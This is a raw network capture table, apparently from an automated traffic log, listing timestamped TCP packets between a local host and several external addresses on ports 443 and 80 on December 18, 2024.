                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.284411907 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.284446955 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.484136105 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.484977961 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.485100985 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.485222101 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.485260963 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.504971981 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.658168077 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.658268929 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.658396959 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.658689022 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.658726931 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.807388067 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.408394098 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.508934021 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.509290934 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.509321928 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.510386944 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.510464907 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.515109062 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.515278101 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.515345097 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.559335947 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.566417933 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.566437006 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.609623909 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.678401947 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.833357096 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.833472967 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.833578110 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.833843946 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.833882093 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.921699047 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.922019958 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.922044039 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.923083067 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.923151016 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.923532009 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.923595905 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.923722982 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.923733950 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.961698055 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.961906910 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.962310076 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.962456942 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.962476015 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.962491035 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.962553024 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.964181900 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.964222908 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.964308977 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.964582920 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.964591980 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.966406107 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:45.382817984 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:45.382905006 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:45.383171082 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:45.383977890 CET49709443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:45.384007931 CET44349709192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:45.609716892 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.177577019 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.177912951 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.177939892 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.178483009 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.178803921 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.178869963 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.178975105 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.223321915 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.550235033 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.550605059 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.550642014 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.551748037 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.551837921 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.552843094 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.552917957 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.600430012 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.600442886 CET44349711142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.623294115 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.623344898 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.623408079 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.623429060 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.624547958 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.624619007 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.624624968 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.627521992 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.627595901 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.627602100 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.632111073 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.632173061 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.632179976 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.640625000 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.640682936 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.640690088 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.648396015 CET49711443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.695385933 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.743130922 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.791399002 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.814937115 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.819101095 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.819261074 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.819273949 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.826220036 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.826289892 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.826297045 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.834702015 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.834767103 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.834774017 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.843250036 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.843317032 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.843322039 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.851906061 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.851963997 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.851970911 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.860286951 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.860342026 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.860351086 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.877166033 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.877264977 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.877271891 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.885756969 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.885829926 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.885838032 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.892002106 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.892055035 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.892061949 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.898818016 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.898879051 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.898891926 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.905328035 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.905390024 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.905399084 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.911479950 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.911571980 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.911587000 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.911621094 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.911767960 CET49712443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.911782980 CET44349712104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080364943 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080463886 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080565929 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080590010 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080636978 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080698967 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080823898 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080857038 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080962896 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.080976963 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.972691059 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.020421982 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.276415110 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.293701887 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.293971062 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.293996096 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295037985 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295109987 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295438051 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295490026 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295608044 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295613050 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295687914 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295912027 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.295949936 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.296953917 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.297013998 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.297310114 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.297374964 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.297451019 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.297462940 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.339543104 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.339549065 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.746191978 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.746241093 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.746335983 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.746364117 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.749639034 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.749667883 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.749723911 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.749732018 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.749778986 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.751260042 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.754461050 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.754513979 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.754518986 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.763040066 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.763199091 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.763204098 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.766048908 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.767585993 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.767622948 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.767635107 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.767669916 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.767718077 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.769201994 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.773758888 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.773819923 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.773828030 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.782522917 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.782593012 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.782605886 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.787195921 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.787244081 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.787332058 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.787542105 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.787558079 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.790712118 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.790780067 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.790790081 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.817433119 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.833416939 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.866524935 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.881798983 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.912414074 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.912436962 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.941483021 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.941600084 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.941626072 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.949575901 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.949661970 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.949690104 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.957722902 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.958537102 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.958610058 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.958617926 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.960865021 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.960942984 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.960978985 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.965857983 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.965951920 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.965959072 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.973912001 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.973990917 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.974025011 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.975852013 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.975924015 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.975931883 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.981941938 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.982008934 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.982017040 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.984177113 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.984268904 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.984282017 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.989799023 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.989890099 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.989903927 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992038965 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992113113 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992125988 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992563009 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992652893 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992723942 CET49713443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.992755890 CET44349713104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.994505882 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.994550943 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.994632959 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.994856119 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:48.994872093 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.004698038 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.004776955 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.004791021 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.011277914 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.011368990 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.011382103 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.018035889 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.018122911 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.018136978 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.024439096 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.024525881 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.024538994 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031128883 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031214952 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031246901 CET44349714104.18.95.41192.168.2.16
